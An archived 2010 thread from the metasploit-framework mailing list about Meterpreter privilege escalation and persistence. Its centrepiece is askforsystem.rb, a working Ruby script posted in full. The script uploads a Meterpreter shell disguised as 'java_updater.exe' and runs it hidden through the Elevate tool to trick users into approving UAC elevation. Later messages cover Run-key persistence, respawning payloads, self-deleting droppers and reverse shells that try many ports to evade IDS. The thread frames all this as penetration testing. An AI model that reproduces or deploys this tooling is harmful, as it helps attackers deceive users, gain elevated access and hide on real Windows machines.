metasploit-framework July 2010 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] uploadexec and kitrap0d

Re: [framework] uploadexec and kitrap0d

From: Rob Fuller <mubix_at_nospam>
Date: Mon Jul 12 2010 - 17:08:18 GMT
To: Devin Kinch <devinkinch@gmail.com>

Thats a pretty pimp script. Carlos? Some of the UAC checks would also be
handy in other scripts as well.

Nice work Devin!

-- Rob Fuller | Mubix Room362.com | Hak5.org On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch@gmail.com> wrote: > > Kitrap0d never works in the wild, in my experience (too old now). If > you're into social engineering and the rules of engagement permit it, I > wrote a cheap hack called askforsystem.rb. Essentially, copies over a > couple files from the "Elevate" Windows power tool, and a new shell. It > then executes the new shell with high IL privileges (which prompts the user > with UAC). I chose the name java_updater.exe for the new shell. It's > cheap, but it works more often than not. > > To use, copy all the files from the elevate power tool to your msf data > directory (extract the archive first): > http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx > > Then copy a meterpreter shell executable named shell.exe into your msf data > directory. The name is hard-coded right now. Sorry. > > Then save the following script to your meterpreter scripts directory as > askforsystem.rb: > > ----- cut ----- > ###################################################### > # AskForSystem: Bypass UAC by, well, asking for it # > ###################################################### > session = client > host,port = session.tunnel_peer.split(':') > > def uaccheck(session) > uac = false > winversion = session.sys.config.sysinfo > if winversion['OS']=~ /(Vista|7)/ > if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM" > print_status("Checking if UAC is enabled ...") > key = > 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' > root_key, base_key = session.sys.registry.splitkey(key) > value = "EnableLUA" > open_key = session.sys.registry.open_key(root_key, base_key, > KEY_READ) > v = open_key.query_value(value) > if v.data == 1 > print_status("\tUAC is Enabled") > uac = true > else > print_status("\tUAC is Disabled") > end > end > end > return uac > end > > def upload(session,file,fileontrgt) > location = session.fs.file.expand_path("%TEMP%") > fileontrgt = "#{location}\\" + fileontrgt > print_status("Uploading File #{file} ...") > session.fs.file.upload_file("#{fileontrgt}","#{file}") > print_status("Upload Complete ...") > return fileontrgt > end > > def execute_as_system(session,file) > location = session.fs.file.expand_path("%TEMP%") > print_status("Running Commands ...") > session.sys.process.execute("cmd /c #{location}\\elevate > #{location}\\#{file}", nil,{'Hidden' => true,'Channelized' => false}) > end > > if not uaccheck(session) then > print_status("UAC isn't running, don't bother...") > raise Rex::Script::Completed > end > > elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd") > elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs") > shell = File.join(Msf::Config.install_root, "data", "shell.exe") > > upload(session,elevatecmd,"elevate.cmd") > upload(session,elevatevbs,"elevate.vbs") > upload(session,shell,"java_updater.exe") > > sleep 1 > > print_status("Executing shell as system...") > execute_as_system(session,"java_updater.exe") > ----cut---- > > My ruby sucks, but you get the idea. If someone wants to take the above > script and add the appropriate railgun calls to ShellExecuteEx with the > runas verb, be my guest. Also keep in mind that UAC isn't that big of an > obstacle to Pen Testing... you can still read all of the users data. You > can also still write to several directories in their profile (AppData is > shown as the target above). You can also make meterpreter persistent by > writing to the HKCU\software\microsoft\windows\currentversion\run key. But > no hashes :( > > Invisible things lab blog has a great writeup of UAC here: > http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html > Especially relevant is the criticism that it doesn't protect any user data, > it just prevents machines from being malware infested bots. > > Devin > > > > > On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35@yahoo.com>wrote: > >> Just tried it. Working like a charm now. Uploaded and executed without a >> problem. >> I should be the one thanking you for sharing so much of your knowledge. >> Your scripts rock and I have learned tons from reading you over the years. >> >> I also noticed the kitrap0d script didn't work on the win 7 machine, >> probably all patched by now. I know that getprivs has gone through some >> changes so what's the best script to run right off the bat when you have >> meterpreter running as non-privileged user, before running scraper, hashdump >> and the like? >> >> >> cheers >> --- On *Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com>*wrote: >> >> >> From: Carlos Perez <carlos_perez@darkoperator.com> >> Subject: Re: [framework] Meterpreter unexpectedly closes >> To: "Miguel Rios" <miguelrios35@yahoo.com> >> Cc: framework@spool.metasploit.com >> Date: Saturday, July 10, 2010, 1:45 PM >> >> svn up and give it a try now, it should be fixed. Thanks for reporting it >> >> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote: >> >> Thanks Carlos. >> Here's the output: running against a win 7 7600 build (english) machine. >> >> meterpreter > run uploadexec -e /root/notepad.exe >> [*] Running Upload and Execute Meterpreter script.... >> [*] Uploading /root/notepad.exe.... >> [*] /root/notepad.exe uploaded! >> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe >> [-] Error in script: ArgumentError wrong number of arguments (4 for 1) >> meterpreter > run uploadexec -e /root/notepad.exe -o /Q >> [*] Running Upload and Execute Meterpreter script.... >> [*] Uploading /root/notepad.exe.... >> [*] /root/notepad.exe uploaded! >> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe >> [-] Error in script: ArgumentError wrong number of arguments (4 for 1) >> meterpreter > run uploadexec -e /root/notepad.exe -v >> [*] Running Upload and Execute Meterpreter script.... >> [*] Uploading /root/notepad.exe.... >> [*] /root/notepad.exe uploaded! >> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe >> [-] Error in script: ArgumentError wrong number of arguments (4 for 1) >> meterpreter > >> >> --- On *Sat, 7/10/10, Carlos Perez <carlos_perez_at_darkoperator.com<http://mc/compose?to=carlos_perez@darkoperator.com> >> >* wrote: >> >> >> From: Carlos Perez <carlos_perez_at_darkoperator.com<http://mc/compose?to=carlos_perez@darkoperator.com> >> > >> Subject: Re: [framework] Meterpreter unexpectedly closes >> To: "Miguel Rios" <miguelrios35_at_yahoo.com<http://mc/compose?to=miguelrios35@yahoo.com> >> > >> Cc: "Alex Polychronopoulos" <tweakier_at_gmail.com<http://mc/compose?to=tweakier@gmail.com>>, >> framework_at_spool.metasploit.com<http://mc/compose?to=framework@spool.metasploit.com> >> Date: Saturday, July 10, 2010, 12:49 PM >> >> Miguel >> >> Do send me the output of what your getting and the command it self and I >> will take a look >> >> Cheers, >> Carlos >> >> On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote >> >> Thanks. That explains it perfectly. For some reason I thought that >> meterpreter would continuously try to connect back. Now I know I was wrong. >> I had tried the loop option with VBS but the problem is that my custom >> script is designed to delete itself after running the meterpreter binary, so >> it obviously won't be there to respawn meterpreter. A bit of a catch 22. >> >> Thinking out loud, I could either schedule it to start every x minutes >> (but you need to be admin to use the 'at' and 'schtasks' I believe) or have >> it auto run at startup through the registry and have a listener permanently >> set up on the internet listening and ready to run a bunch of scripts like >> scraper, etc (by the way, any literature out there on setting up just >> meterpreter listeners and scripts on a webserver or do I have to set up the >> full MSF on the server?). >> >> Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It >> wasn't a question of the exploited process dying since it's a standalone >> meterpreter binary I'm playing with. >> >> Curious to see if there is any news or development regarding the all_ports >> possibility for this payload, like with reverse_tcp. That would be super >> stealth and highly effective at egressing the most restrictive networks. >> >> P.S. off topic here but I'm also having trouble with the uploadexec >> script. I manage to upload my notepad.exe binary to %temp% but it doesn't >> execute and the script spits out some error message about wrong count (4 of >> 1 or something like that) or missing argument. Does this have something to >> do with the -o switch? Is it mandatory? I just want my binary to be silently >> executed but I must be missing something stupidly obvious. Time to sleep >> maybe. >> >> --- On *Sat, 7/10/10, Alex Polychronopoulos <tweakier@gmail.com>* wrote: >> >> >> From: Alex Polychronopoulos <tweakier@gmail.com> >> Subject: Re: [framework] Meterpreter unexpectedly closes >> To: "Miguel Rios" <miguelrios35@yahoo.com> >> Cc: framework@spool.metasploit.com >> Date: Saturday, July 10, 2010, 8:28 AM >> >> Meterpreter is designed to not persistently trying to connect back to the >> handler, it tries once and then dies, so you're not doing something wrong. >> What you can do here is try the msfencode -t loop_vbs option which converts >> the payload into a vbscript and runs it every 5 seconds by default (you can >> change this by editing the generated .vbs file). >> >> On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35@yahoo.com>wrote: >> >>> Hi list, >>> I've msfencoded a meterpreter reverse https payload using a win binary as >>> a template. Everything seems to work fine when I test it in my XP SP3. I >>> see the outbound connection and the process running, but after about a >>> minute or so the process dies if there's no listener configured on the >>> receiving end and doesn't respawn. >>> What am I doing wrong here? I must be missing something obvious. Is there >>> a timeout option for this reverse shell or a way to keep the process always >>> running, even if it can't connect to the listener? Or is this due to >>> msfencoding the payload somehow breaks it? I have tested that it does work >>> properly when the listener is waiting for it, it's just the fact it timesout >>> so quickly that is a pain. >>> >>> Also, saw the reverse_tcp allports payload and was wondering if there's a >>> similar one for reverse meterpreter https. Ideally one could configure >>> default ports to try 1st and then keep trying randomly the other 65000 or so >>> to evade IDS. I know this would increase the payload size but it would be >>> pretty stealth egress wise. >>> >>> Thanks. I do really love metasploit and the whole community behind it. >>> You all rock. >>> >>> Miguel >>> >>> >>> _______________________________________________ >>> https://mail.metasploit.com/mailman/listinfo/framework >>> >>> >> >> _______________________________________________ >> https://mail.metasploit.com/mailman/listinfo/framework >> >> >> >> >> >> >> _______________________________________________ >> https://mail.metasploit.com/mailman/listinfo/framework >> >> > > _______________________________________________ > https://mail.metasploit.com/mailman/listinfo/framework > >

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework